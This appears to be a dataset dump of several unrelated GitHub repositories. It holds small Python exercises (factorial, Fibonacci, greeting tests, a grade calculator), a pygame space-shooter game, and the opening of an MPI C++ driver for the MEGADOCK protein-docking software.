(say_hello_personal('Isabella'))\n\n##Testing\n#has two main section: Setup and Evaluatation\n#You give it controlled input and test for expected outcomes\n\n#Test 1: say_hello functions\n#Spec: when call should return string 'hello'\nsetup_results = say_hello()\nprint(setup_results == 'hello')\n\n#Test 2: testing say hello personalize functions\nsay_hello_personal('Isabella')=='Hello Isabella'\n\n\n#Test 3: testing function full_name_hello\nprint(\"calling function full_name_hello() with Isabella Jones, expect 'hello Isabella Jones' to be printed\")\nprint(full_name_hello('isabella', 'jones')== 'hello Isabella Jones')" } ]
2
MiguelVillanuev4/EDA1-Practica12
https://github.com/MiguelVillanuev4/EDA1-Practica12
ef78cb70f95632056828aaa7382781b5b1b64404
aebad98756afc4b864727e8f3eb95ede25ad2ab9
83b2eb9fba916bdff7d6d4e01c29da0248cab795
refs/heads/master
2022-04-26T16:43:41.332319
2020-04-29T01:06:37
2020-04-29T01:06:37
259,789,542
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6418918967247009, "alphanum_fraction": 0.6689189076423645, "avg_line_length": 22.66666603088379, "blob_id": "aa045d77ac2af9cfcd0e8e1d4411c28aaa7ef844", "content_id": "af0e19d3f5c3bad14026a05f00c94528589442c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 50, "num_lines": 6, "path": "/Factorial.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "def factorial_recursivo(numero):\r\n if numero<2:\r\n return 1\r\n return numero* factorial_recursivo(numero - 1)\r\n\r\nfactorial_recursivo(5)\r\n" }, { "alpha_fraction": 0.6192468404769897, "alphanum_fraction": 0.6610878705978394, "avg_line_length": 24.55555534362793, "blob_id": "1d876f3ce67f571b04153301eaf592a98ccf5eec", "content_id": "085ae58604b555bd542ebd52bab1f659cc4cce3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/fibonacciMemo.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "memoria ={1:0, 2:1, 3:1}\r\n\r\ndef fibonacci_memo(numero):\r\n if numero in memoria:\r\n return memoria[numero]\r\n memoria[numero]=fibonacci_memo(numero-1) + fibonacci_memo(numero-2)\r\n return memoria[numero]\r\n\r\nfibonacci_memo(13)\r\n" }, { "alpha_fraction": 0.6026785969734192, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 25.75, "blob_id": "ada0124e06f85be745c4ed01df7e163c5586bfd7", "content_id": "d531b52bb16b53934863461aad7c7e43e78c2faa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 72, "num_lines": 8, "path": "/FibonacciRecursivo.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "def fibonacci_recursivo(numero):\r\n if numero==1:\r\n return 0\r\n if numero==2 or numero==3:\r\n return 1\r\n return fibonacci_recursivo(numero-1) + fibonacci_recursivo(numero-2)\r\n\r\nfibonacci_recursivo(13)\r\n\r\n" }, { "alpha_fraction": 0.5668789744377136, "alphanum_fraction": 0.5923566818237305, "avg_line_length": 20.428571701049805, "blob_id": "8885910c747a59bc250f36b86cb4cc2c6ccb8cab", "content_id": "77caa2ac8e18005750dc2db1343c2f5f0fa554ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/FactorialNo.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "def factorial_no_recursivo(numero):\r\n fact=1\r\n for i in range(numero, 1, -1):\r\n fact = fact * i \r\n return fact\r\n\r\nfactorial_no_recursivo(5)\r\n" } ]
4
root-folder/instamark
https://github.com/root-folder/instamark
ca52dec77422226f24ac220c9fd0d908185d4734
5a2eadb17b9763300bbc7d6fc5044d1db89402d5
41ff308ea1f146cd733a00a9cfed90071b50447f
refs/heads/master
2022-12-09T05:51:39.483812
2020-08-18T12:57:53
2020-08-18T12:57:53
288,449,384
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6013578772544861, "alphanum_fraction": 0.6246362924575806, "avg_line_length": 18.846153259277344, "blob_id": "d9438f4d75c088a383ad847607ee1ce1f16c2823", "content_id": "555ee09e79e69b2d2503040af2c062c71e8f9b63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 47, "num_lines": 52, "path": "/instamark.py", "repo_name": "root-folder/instamark", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nline = \"-\" * 35\n\na = ('Distinction','A')\nb = ('Merit','B')\nc = ('Credit','C')\nd = ('Satisfactory', ' D')\nf = ('UnSatisfactory', 'F')\n\ndef unpacker(values):\n\tfor item in values:\n\t\tprint(item)\n\tprint(line)\n\ndef calculator(paper_mark = 0, pupil_mark = 0):\n\tpercent = (pupil_mark / paper_mark) * 100\n\treturn round(percent)\n\ndef invalid_value():\n\tprint(\"Invalid value!\")\n\tprint(line)\n\ndef decider(percentage = 0):\n\tif (percentage < 1) | (percentage > 100):\n\t\tinvalid_value()\n\telif percentage >= 75:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(a)\n\telif percentage >= 65:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(b)\n\telif percentage >= 40:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(c)\n\telif percentage >= 30:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(d)\n\telif percentage < 30:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(f)\n\ntry:\n\tpaper = int(input(\"Paper's Mark: \"))\n\n\twhile True:\n\t\tpupil = int(input(\"Pupil's Mark: \"))\n\t\tif pupil == 0:\n\t\t\tprint(\"Good Bye!\")\n\t\t\tbreak\n\t\tdecider(calculator(paper, pupil))\nexcept:\n\tpass" }, { "alpha_fraction": 0.7872340679168701, "alphanum_fraction": 0.7978723645210266, "avg_line_length": 36.599998474121094, "blob_id": "641e79b4723abdaa601d27148d33308cd210ab8b", "content_id": "d0c67b9fcbd07254a44145ca41004f19e6e27ca2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 62, "num_lines": 5, "path": "/README.md", "repo_name": "root-folder/instamark", "src_encoding": "UTF-8", "text": "# instamark\nthe program gives instant results when grading students papers\nstep 1: enter the paper's mark\nstep 2: enter the pupil's mark\nthe program gives a percentage mark, and the grade\n" } ]
2
OffTheMark/SpaceSkirmishers
https://github.com/OffTheMark/SpaceSkirmishers
221dfc00e036ffc61166315abe9e220208801479
54ead1d73d227b0d41e218947e1f662986c1c319
12e90de018e2024e87cf008baccf69d98a317c19
refs/heads/master
2021-01-22T17:29:18.435537
2017-03-15T23:51:51
2017-03-15T23:51:51
85,020,692
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5677452087402344, "alphanum_fraction": 0.581507682800293, "avg_line_length": 36.55696105957031, "blob_id": "36800603c05b4b79de640a2a9687f051b3fe5c41", "content_id": "685c89cd643777324b354de2a345659504549de4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17802, "license_type": "no_license", "max_line_length": 147, "num_lines": 474, "path": "/space_skirmishers.py", "repo_name": "OffTheMark/SpaceSkirmishers", "src_encoding": "UTF-8", "text": "import pygame\nimport sys\nfrom random import randint\n\n\nGAME_TITLE = \"Space Skirmishers\"\nPLAYER_1_NAME = \"Player 1\"\nPLAYER_2_NAME = \"Player 2\"\nBULLET_NAME = \"Bullet\"\nOBSTACLE_NAME = \"Obstacle\"\n\nNEAR_BLACK = (19, 15, 48)\nGREEN = (0, 255, 0)\nYELLOW = (255, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nORANGE = (255, 69, 0)\nWHITE = (255, 255, 255)\n\nPLAYER_1_KEY_UP = pygame.K_w\nPLAYER_1_KEY_DOWN = pygame.K_s\nPLAYER_1_KEY_SHOOT = pygame.K_SPACE\nPLAYER_2_KEY_UP = pygame.K_UP\nPLAYER_2_KEY_DOWN = pygame.K_DOWN\nPLAYER_2_KEY_SHOOT = pygame.K_KP0\n\nCOLOR_BACKGROUND = NEAR_BLACK\nCOLOR_BULLET = RED\nCOLOR_HP_3 = GREEN\nCOLOR_HP_2 = YELLOW\nCOLOR_HP_1 = ORANGE\nCOLOR_PLAYER_1_BULLET = BLUE\nCOLOR_PLAYER_2_BULLET = RED\nCOLOR_OBSTACLE = GREEN\n\nTITLE_TEXT_SIZE = 75\nSUBTITLE_TEXT_SIZE = 40\nTITLE_SUBTITLE_MARGIN = 10\n\nPLAYER_WIDTH = 25\nPLAYER_HEIGHT = 80\nPLAYER_SPEED = 20\nPLAYER_1_BULLET_DIRECTION_X = 1\nPLAYER_2_BULLET_DIRECTION_X = -1\nPLAYER_MAX_BULLETS = 2\n\nBULLET_WIDTH = 10\nBULLET_HEIGHT = 5\nBULLET_DELAY = 500\nBULLET_SPEED = 20\n\nOBSTACLE_HEIGHT = 20\nOBSTACLE_WIDTH = 20\nOBSTACLE_TYPE_1_ROWS = 6\nOBSTACLE_TYPE_1_COLUMNS = 4\nOBSTACLE_TYPE_2_ROWS = 4\nOBSTACLE_TYPE_2_COLUMNS = 4\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_MARGIN = 15\nBOUNDS_MIN_X = SCREEN_MARGIN\nBOUNDS_MAX_X = SCREEN_WIDTH - SCREEN_MARGIN\nBOUNDS_MIN_Y = SCREEN_MARGIN\nBOUNDS_MAX_Y = SCREEN_HEIGHT - SCREEN_MARGIN\nBULLET_MARGIN = (PLAYER_WIDTH - BULLET_WIDTH) / 2\nOBSTACLE_MARGIN_X = 100\nOBSTACLE_MARGIN_Y = 50\nOBSTACLE_BOUNDS_MIN_X = BOUNDS_MIN_X + OBSTACLE_MARGIN_X\nOBSTACLE_BOUNDS_MAX_X = BOUNDS_MAX_X - OBSTACLE_MARGIN_X\nOBSTACLE_BOUNDS_MIN_Y = BOUNDS_MIN_Y + OBSTACLE_MARGIN_Y\nOBSTACLE_BOUNDS_MAX_Y = BOUNDS_MAX_Y - OBSTACLE_MARGIN_Y\n\nLEVELS = [\n [\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y,\n \"left\": OBSTACLE_BOUNDS_MIN_X,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_TYPE_1_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y,\n \"left\": OBSTACLE_BOUNDS_MAX_X - OBSTACLE_TYPE_1_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_TYPE_1_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MAX_X - OBSTACLE_TYPE_1_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y + 0.5 * (OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_BOUNDS_MIN_Y) - 0.5 * OBSTACLE_TYPE_1_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X + 0.5 * (OBSTACLE_BOUNDS_MAX_X - OBSTACLE_BOUNDS_MIN_X) - 0.5 * OBSTACLE_TYPE_1_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n }\n ],\n [\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y + 0.5 * (OBSTACLE_BOUNDS_MAX_Y - 
OBSTACLE_BOUNDS_MIN_Y) - 0.5 * OBSTACLE_TYPE_2_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X,\n \"rows\": OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y + 0.5 * (OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_BOUNDS_MIN_Y) - 0.5 * OBSTACLE_TYPE_2_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MAX_X - OBSTACLE_TYPE_2_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y,\n \"left\": OBSTACLE_BOUNDS_MIN_X + 0.5 * (OBSTACLE_BOUNDS_MAX_X - OBSTACLE_BOUNDS_MIN_X) - 0.5 * OBSTACLE_TYPE_2_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_TYPE_2_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X + 0.5 * (OBSTACLE_BOUNDS_MAX_X - OBSTACLE_BOUNDS_MIN_X) - 0.5 * OBSTACLE_TYPE_2_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n }\n ]\n]\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, name, key_move_up, key_move_down):\n pygame.sprite.Sprite.__init__(self)\n self.width = PLAYER_WIDTH\n self.height = PLAYER_HEIGHT\n self.color = COLOR_HP_3\n self.image = pygame.Surface((self.width, self.height))\n self.rect = self.image.get_rect()\n self.speed = PLAYER_SPEED\n self.direction_y = 0\n self.name = name\n self.key_move_up = key_move_up\n self.key_move_down = key_move_down\n self.hit_points = 3\n\n def update(self, keys, *args):\n if keys[self.key_move_up]:\n self.rect.y -= self.speed\n if keys[self.key_move_down]:\n self.rect.y += self.speed\n\n self.check_bounds()\n self.image.fill(self.color)\n\n def check_bounds(self):\n if self.rect.top < BOUNDS_MIN_Y:\n self.rect.top = BOUNDS_MIN_Y\n self.direction_y = 0\n elif self.rect.bottom > BOUNDS_MAX_Y:\n self.rect.bottom = BOUNDS_MAX_Y\n self.direction_y = 0\n\n def compute_hit(self):\n if self.hit_points > 0:\n self.hit_points -= 1\n\n if self.hit_points == 2:\n self.color = COLOR_HP_2\n elif self.hit_points == 1:\n self.color = COLOR_HP_1\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, rect, color, direction_x, speed):\n pygame.sprite.Sprite.__init__(self)\n self.width = BULLET_WIDTH\n self.height = BULLET_HEIGHT\n self.color = color\n self.image = pygame.Surface((self.width, self.height))\n self.image.fill(self.color)\n self.rect = self.image.get_rect()\n self.rect.centery = rect.centery\n self.rect.left = rect.left + BULLET_MARGIN\n self.name = BULLET_NAME\n self.direction_x = direction_x\n self.speed = speed\n\n def update(self, *args):\n self.rect.x += self.direction_x * self.speed\n\n if self.rect.left < 0 or self.rect.right > SCREEN_WIDTH:\n self.kill()\n\n\nclass Obstacle(pygame.sprite.Sprite):\n def __init__(self, left, top, color):\n pygame.sprite.Sprite.__init__(self)\n self.width = OBSTACLE_WIDTH\n self.height = OBSTACLE_HEIGHT\n self.color = color\n self.image = pygame.Surface((self.width, self.height))\n self.image.fill(self.color)\n self.rect = self.image.get_rect()\n self.name = OBSTACLE_NAME\n self.rect.top = top\n self.rect.left = left\n\n\nclass Text:\n def __init__(self, font, size, message, color, rect):\n self.font = pygame.font.Font(font, size)\n self.color = color\n self.set_message(message)\n self.rect = self.surface.get_rect()\n self.rect.centerx = rect.centerx\n self.rect.centery = rect.centery\n\n def draw(self, surface):\n surface.blit(self.surface, self.rect)\n\n def set_message(self, message):\n 
self.surface = self.font.render(message, True, self.color)\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n self.display_screen, self.display_rect = self.make_screen()\n self.intro_sound = pygame.mixer.Sound('assets/intro.wav')\n self.laser_sound = pygame.mixer.Sound('assets/laser.ogg')\n self.block_kill_sound = pygame.mixer.Sound('assets/block_kill.wav')\n self.player_hit_sounds = [\n pygame.mixer.Sound('assets/player_hit_0_hp.wav'),\n pygame.mixer.Sound('assets/player_hit_1_hp.wav'),\n pygame.mixer.Sound('assets/player_hit_2_hp.wav')\n ]\n # Initialize flags to new game state\n self.game_over_state = False\n self.new_game_state = True\n self.game_started_state = False\n\n def make_screen(self):\n # Create screen and its rectangle for display\n pygame.display.set_caption(GAME_TITLE)\n display_screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n display_rect = display_screen.get_rect()\n display_screen.fill(COLOR_BACKGROUND)\n display_screen.convert()\n return display_screen, display_rect\n\n def make_players(self):\n # Create players\n player_1 = Player(PLAYER_1_NAME, PLAYER_1_KEY_UP, PLAYER_1_KEY_DOWN)\n player_2 = Player(PLAYER_2_NAME, PLAYER_2_KEY_UP, PLAYER_2_KEY_DOWN)\n # Position them on their initial positions\n player_1.rect.top = BOUNDS_MIN_Y\n player_1.rect.left = BOUNDS_MIN_X\n player_2.rect.bottom = BOUNDS_MAX_Y\n player_2.rect.right = BOUNDS_MAX_X\n\n return player_1, player_2\n\n def make_obstacles(self):\n obstacle_group = pygame.sprite.Group()\n # Load one of the levels and its obstacles\n level = LEVELS[randint(0, 1)]\n for obstacle in level:\n obstacle_group.add(self.make_obstace_group(obstacle[\"top\"], obstacle[\"left\"], obstacle[\"rows\"], obstacle[\"columns\"]))\n return obstacle_group\n\n def make_obstace_group(self, top, left, rows, columns):\n obstacle_group = pygame.sprite.Group()\n for row in range(rows):\n for column in range(columns):\n x = left + column * OBSTACLE_WIDTH\n y = top + row * OBSTACLE_HEIGHT\n obstacle = Obstacle(x, y, COLOR_OBSTACLE)\n obstacle_group.add(obstacle)\n return obstacle_group\n\n def check_input(self):\n for event in pygame.event.get():\n # Update value of keys to pass it along to sprites later\n self.keys = pygame.key.get_pressed()\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == PLAYER_1_KEY_SHOOT and len(self.player_1_bullets) < PLAYER_MAX_BULLETS:\n # Pew pew\n self.laser_sound.play()\n # Add bullet to sprite groups with the correct speed and direction\n bullet = Bullet(self.player_1.rect, COLOR_PLAYER_1_BULLET, PLAYER_1_BULLET_DIRECTION_X, BULLET_SPEED)\n self.player_1_bullets.add(bullet)\n self.all_bullets.add(bullet)\n self.all_sprites.add(bullet)\n elif event.key == PLAYER_2_KEY_SHOOT and len(self.player_2_bullets) < PLAYER_MAX_BULLETS:\n self.laser_sound.play()\n bullet = Bullet(self.player_2.rect, COLOR_PLAYER_2_BULLET, PLAYER_2_BULLET_DIRECTION_X, BULLET_SPEED)\n self.player_2_bullets.add(bullet)\n self.all_bullets.add(bullet)\n self.all_sprites.add(bullet)\n\n def check_game_over_input(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYUP:\n # Update flags to new game state\n self.new_game_state = True\n self.game_started_state = False\n self.game_over_state = False\n\n def check_game_to_start_input(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYUP:\n # Update flags to game started state\n self.new_game_state = 
False\n            self.game_started_state = True\n            self.game_over_state = False\n            self.intro_sound.play()\n\n    def check_collisions(self):\n        hits_bullets_1 = pygame.sprite.groupcollide(self.player_1_bullets, self.all_obstacles, True, False)\n        hits_bullets_2 = pygame.sprite.groupcollide(self.player_2_bullets, self.all_obstacles, True, False)\n        # Check collisions between each player's bullets and obstacles\n        for bullet, obstacles in hits_bullets_1.items():\n            closest = obstacles[0]\n            for obstacle in obstacles:\n                # Get the topmost and leftmost obstacle to remove\n                if obstacle.rect.left < closest.rect.left and obstacle.rect.top < closest.rect.top:\n                    closest = obstacle\n            closest.kill()\n        for bullet, obstacles in hits_bullets_2.items():\n            closest = obstacles[0]\n            for obstacle in obstacles:\n                # Get the topmost and rightmost obstacle to remove\n                if obstacle.rect.left > closest.rect.left and obstacle.rect.top < closest.rect.top:\n                    closest = obstacle\n            closest.kill()\n        # Check collisions between bullets and players\n        for bullet in self.player_1_bullets:\n            if pygame.sprite.collide_rect(bullet, self.player_2):\n                # Handle each hit's effect on player and bullet\n                self.player_2.compute_hit()\n                # Play relevant sound effect (according to player HP)\n                self.player_hit_sounds[self.player_2.hit_points].play()\n                bullet.kill()\n        for bullet in self.player_2_bullets:\n            if pygame.sprite.collide_rect(bullet, self.player_1):\n                self.player_1.compute_hit()\n                self.player_hit_sounds[self.player_1.hit_points].play()\n                bullet.kill()\n\n    def check_game_over(self):\n        if self.player_1.hit_points == 0 or self.player_2.hit_points == 0:\n            # Update flags to game over state\n            self.game_over_state = True\n            self.new_game_state = False\n            self.game_started_state = False\n            self.handle_game_over()\n\n    def handle_game_over(self):\n        subtitle = \"\"\n        if self.player_1.hit_points == self.player_2.hit_points:\n            subtitle = \"Both players lose\"\n        elif self.player_1.hit_points > 0:\n            subtitle = \"{} wins\".format(self.player_1.name)\n        else:\n            subtitle = \"{} wins\".format(self.player_2.name)\n        # Update game over subtitle with game ending message (according to winners/losers)\n        self.game_over_subtitle = Text(\n            'assets/arcadeclassic.ttf',\n            SUBTITLE_TEXT_SIZE,\n            subtitle,\n            WHITE,\n            self.display_rect\n        )\n        self.game_over_subtitle.rect.top = self.game_over_title.rect.bottom + TITLE_SUBTITLE_MARGIN\n\n    def quit(self):\n        pygame.quit()\n        sys.exit()\n\n    def setup_game(self):\n        # Set up text elements\n        self.intro_title = Text(\n            'assets/arcadeclassic.ttf',\n            TITLE_TEXT_SIZE,\n            'Space Skirmishers',\n            WHITE,\n            self.display_rect\n        )\n        self.intro_subtitle = Text(\n            'assets/arcadeclassic.ttf',\n            SUBTITLE_TEXT_SIZE,\n            'Press any key to start game',\n            WHITE,\n            self.display_rect\n        )\n        self.intro_subtitle.rect.top = self.intro_title.rect.bottom + TITLE_SUBTITLE_MARGIN\n        self.game_over_title = Text(\n            'assets/arcadeclassic.ttf',\n            TITLE_TEXT_SIZE,\n            'Game over',\n            WHITE,\n            self.display_rect\n        )\n        # Set up sprites\n        self.player_1, self.player_2 = self.make_players()\n        self.player_1_bullets = pygame.sprite.Group()\n        self.player_2_bullets = pygame.sprite.Group()\n        self.all_bullets = pygame.sprite.Group(self.player_1_bullets, self.player_2_bullets)\n        self.obstacle_group_1 = self.make_obstacles()\n        self.all_obstacles = pygame.sprite.Group(self.obstacle_group_1)\n        self.all_sprites = pygame.sprite.Group(self.player_1, self.player_2, self.all_obstacles, self.all_bullets)\n        # Set up timing and inputs\n        self.fps = 30\n        self.keys = pygame.key.get_pressed()\n        self.clock = 
pygame.time.Clock()\n # Set up flags\n self.new_game_state = True\n self.game_started_state = False\n self.game_over_state = False\n\n def main_loop(self):\n while True:\n if self.new_game_state:\n self.setup_game()\n self.game_over_state = False\n # Handle events\n self.check_game_to_start_input()\n # Draw surface\n self.display_screen.fill(COLOR_BACKGROUND)\n self.intro_title.draw(self.display_screen)\n self.intro_subtitle.draw(self.display_screen)\n # Show surface\n pygame.display.update()\n elif self.game_over_state:\n # Handle events\n self.check_game_over_input()\n # Draw surface\n self.display_screen.fill(COLOR_BACKGROUND)\n self.game_over_title.draw(self.display_screen)\n self.game_over_subtitle.draw(self.display_screen)\n # Show surface\n pygame.display.update()\n elif self.game_started_state:\n current_time = pygame.time.get_ticks()\n # Handle events\n self.check_input()\n self.check_game_over()\n # Draw surface\n self.display_screen.fill(COLOR_BACKGROUND)\n # Update game elements\n self.all_sprites.update(self.keys, current_time)\n self.check_collisions()\n # Drawing surface\n self.all_sprites.draw(self.display_screen)\n # Show surface\n pygame.display.update()\n\n self.clock.tick(self.fps)\n\n\nif __name__ == \"__main__\":\n game = Game()\n game.main_loop()\n" } ]
1
akiyamalab/megadock_hpccm
https://github.com/akiyamalab/megadock_hpccm
7a361c558616b097595be626df735a24b17f2240
48e356f51b012faa59c2187c301d7c8569662d05
36716fcd4d4a2dc34bc31fde31c1e27cf06215e2
refs/heads/master
2020-10-01T08:54:03.743500
2019-12-24T08:02:08
2019-12-24T08:02:08
227,503,169
1
0
Apache-2.0
2019-12-12T02:29:17
2019-12-18T07:49:22
2019-12-18T09:10:48
C++
[ { "alpha_fraction": 0.4348600208759308, "alphanum_fraction": 0.44910311698913574, "avg_line_length": 30.913352966308594, "blob_id": "a862e21adaf90d547f55070442a8678fcd50d91c", "content_id": "597e4c7f55e117b9d999186c4814fbad131f0148", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 22467, "license_type": "permissive", "max_line_length": 144, "num_lines": 704, "path": "/megadock-scfa20/mpidp.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Mpidp\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"mpidp.h\"\n\n#define LASTUPDATED \"2014/4/30\"\n#define MASTER_PROCESS_ID 0\n#define MASTER_THREAD_ID 0\n\n#ifndef SYSTEMCALL\nint application(int argc,char *argv[]);\n#endif\n\n//============================================================================//\nint main(int argc,char *argv[])\n//============================================================================//\n{\n Mpidp\t\tmpidp;\n ofstream\tlogout;\t\t\t\t// log file stream\n double stime, etime;\n int \t\tnproc, myid, resultlen;\t\t// for MPI parameters\n char\t\thostname[MPI_MAX_PROCESSOR_NAME];\n \n struct timeval et1, et2;\n // Preparation using MPI\n MPI_Init(&argc,&argv);\n stime = MPI_Wtime();\n MPI_Comm_size(MPI_COMM_WORLD,&nproc);\n MPI_Comm_rank(MPI_COMM_WORLD,&myid);\n MPI_Get_processor_name(hostname,&resultlen);\n char *hostall = new char [nproc*MPI_MAX_PROCESSOR_NAME];\n MPI_Gather(hostname,MPI_MAX_PROCESSOR_NAME,MPI_CHAR,\n hostall,MPI_MAX_PROCESSOR_NAME,MPI_CHAR,\n 0,MPI_COMM_WORLD);\n\n // for master process\n if( myid == MASTER_PROCESS_ID ){\n gettimeofday(&et1,NULL);\n string log_file = \"./master.log\";\t\t// Default log file name\n for( int i = 1 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-lg\",3) ) {\n log_file = argv[++i];\n }\n }\n \n logout.open(log_file.c_str());\n if( !logout ) {\n cerr << \"[ERROR] Log file [\" << log_file << \"] was not opened!!\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n exit(1);\n }\n \n logout << \" MEGADOCK ver. 
4.0 Master Process\"<< endl;\n logout << \" [email protected] last updated: \"\n << LASTUPDATED << endl << endl;\n logout << \"#RANK = \" << nproc << endl;\n \n int nprocess = 1;\t\t\t\t// # of processes in one core\n string *shost = new string[nproc];\t\t// Hostname\n shost[0] = &hostall[0];\n for( int i = 1 ; i < nproc ; i++ ) {\n shost[i] = &hostall[i*MPI_MAX_PROCESSOR_NAME];\n if( shost[i] == shost[0] ) {\n nprocess ++;\n }\n else {\n break;\n }\n }\n logout << \"#Node = \" << nproc/nprocess\n << \" (#RANK/Node = \" << nprocess << \")\" << endl;\n \n logout << \"\\n used nodes list(id) :\";\n for( int i = 0 ; i < nproc ; i++ ) {\n if( i % 5 == 0 ) {\n logout << endl;\n }\n logout << \" \" << &hostall[i*MPI_MAX_PROCESSOR_NAME] << \"(\" << i << \")\";\n }\n logout << endl << endl;\n logout.flush();\n delete [] shost;\n }\n \n if( myid == MASTER_PROCESS_ID ) {\t\t\t// for master\n //int ntry;\t\t\t\t// Upper limit of the number of retries\n int eflag;\t\t\t\t// return flag\n \n // Read command options and JOB list\n mpidp.read_table(argc,argv,logout);\n \n eflag = mpidp.master0(argc, argv, nproc);\t// = 0 (MPI_Finalize) or 1 (MPI_Abort)\n }\n else {\t\t\t\t// for workers\n mpidp.worker(myid,hostname,argc,argv);\n }\n \n etime = MPI_Wtime();\n\n printf(\"\\nTotal time (process %5d) = %8.2f sec.\\n\", myid, etime - stime);\n\n MPI_Barrier(MPI_COMM_WORLD);\n MPI_Finalize();\n \n if( myid == MASTER_PROCESS_ID ) {\n gettimeofday(&et2,NULL);\n const float total_time = (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n logout << \"\\nElapsed time = \" << total_time << \" sec.\" << endl;\n printf(\"\\nTotal time (entire process) = %8.2f sec.\\n\", total_time);\n }\n \n return 0;\n}\n\n\n//============================================================================//\nvoid Mpidp::read_table(int argc,char *argv[],ofstream &logout)\n// Read command options and JOB list\n//============================================================================//\n{\n int\t\tcsize = 0;\n int\t\tndata = 0;\n string\ttable;\n \n _Title = \"MasterProc\"; // TITLE (initialization)\n _Param = \"MPIDP\";\t\t\t// PARAM data (initialization)\n _Psize = _Param.size() + 1;\n _Smallest_chunk_size = 